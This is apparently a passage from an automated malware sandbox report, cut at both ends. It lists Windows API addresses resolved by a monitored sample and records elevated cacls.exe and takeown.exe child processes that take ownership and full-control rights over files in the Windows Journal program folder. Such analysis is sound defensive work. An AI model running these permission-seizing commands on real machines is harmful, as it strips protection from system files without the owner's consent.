| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:13:30 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #246: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #246 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\Templates\Genko_1.jtp" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:56, Reason: Child Process |
| Unmonitor | End Time: 00:03:58, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x524 |
| Parent PID | 0xee8 (c:\windows\syswow64\cacls.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
EA4
0x
C70
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000005d0000 | 0x005d0000 | 0x005effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005d0000 | 0x005d0000 | 0x005dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000005e0000 | 0x005e0000 | 0x005e3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005f0000 | 0x005f0000 | 0x005f1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005f0000 | 0x005f0000 | 0x005fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000600000 | 0x00600000 | 0x00613fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x0065ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000660000 | 0x00660000 | 0x0069ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006a0000 | 0x006a0000 | 0x006a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006b0000 | 0x006b0000 | 0x006b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000006c0000 | 0x006c0000 | 0x006c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x006d0000 | 0x0078dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000790000 | 0x00790000 | 0x007cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007d0000 | 0x007d0000 | 0x007d3fff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x007e0000 | 0x007e1fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000800000 | 0x00800000 | 0x0080ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000810000 | 0x00810000 | 0x0094ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000810000 | 0x00810000 | 0x0084ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000850000 | 0x00850000 | 0x0094ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00950000 | 0x00c86fff | Memory Mapped File | r |
|
|
|
- |
| cacls.exe | 0x01040000 | 0x01049fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001050000 | 0x01050000 | 0x0504ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x743a0000 | 0x743c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ec80000 | 0x7ec80000 | 0x7ed7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ed80000 | 0x7ed80000 | 0x7eda2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eda7000 | 0x7eda7000 | 0x7eda9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007edaa000 | 0x7edaa000 | 0x7edacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007edad000 | 0x7edad000 | 0x7edadfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007edaf000 | 0x7edaf000 | 0x7edaffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #247: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #247 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\Templates\Genko_1.jtp" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:58, Reason: Child Process |
| Unmonitor | End Time: 00:03:59, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9f8 |
| Parent PID | 0xee8 (c:\windows\syswow64\cacls.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
28C
0x
274
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000009e0000 | 0x009e0000 | 0x009fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000009e0000 | 0x009e0000 | 0x009effff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000009f0000 | 0x009f0000 | 0x009f3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a00000 | 0x00a00000 | 0x00a01fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x00a00000 | 0x00a04fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000a10000 | 0x00a10000 | 0x00a23fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000a30000 | 0x00a30000 | 0x00a6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a70000 | 0x00a70000 | 0x00aaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ab0000 | 0x00ab0000 | 0x00ab3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ac0000 | 0x00ac0000 | 0x00ac0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ad0000 | 0x00ad0000 | 0x00ad1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00ae0000 | 0x00b9dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000ba0000 | 0x00ba0000 | 0x00bdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000be0000 | 0x00be0000 | 0x00c1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c20000 | 0x00c20000 | 0x00c20fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c30000 | 0x00c30000 | 0x00c3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c40000 | 0x00c40000 | 0x00e2ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00c40000 | 0x00c69fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000c40000 | 0x00c40000 | 0x00c40fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d30000 | 0x00d30000 | 0x00e2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e30000 | 0x00e30000 | 0x0100ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e30000 | 0x00e30000 | 0x00fb7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001000000 | 0x01000000 | 0x0100ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001010000 | 0x01010000 | 0x01190fff | Pagefile Backed Memory | r |
|
|
|
- |
| takeown.exe | 0x01220000 | 0x0122ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001230000 | 0x01230000 | 0x0522ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x0000000005230000 | 0x05230000 | 0x0662ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x06630000 | 0x06966fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x743a0000 | 0x743c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f820000 | 0x7f820000 | 0x7f91ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f920000 | 0x7f920000 | 0x7f942fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f945000 | 0x7f945000 | 0x7f947fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f948000 | 0x7f948000 | 0x7f948fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f94b000 | 0x7f94b000 | 0x7f94bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f94d000 | 0x7f94d000 | 0x7f94ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #248: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #248 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:58, Reason: Child Process |
| Unmonitor | End Time: 00:03:58, Reason: Self Terminated |
| Monitor Duration | 00:00:00 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x34c |
| Parent PID | 0x3e4 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A0C
0x
B38
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000cd0000 | 0x00cd0000 | 0x00ceffff | Private Memory | rw |
|
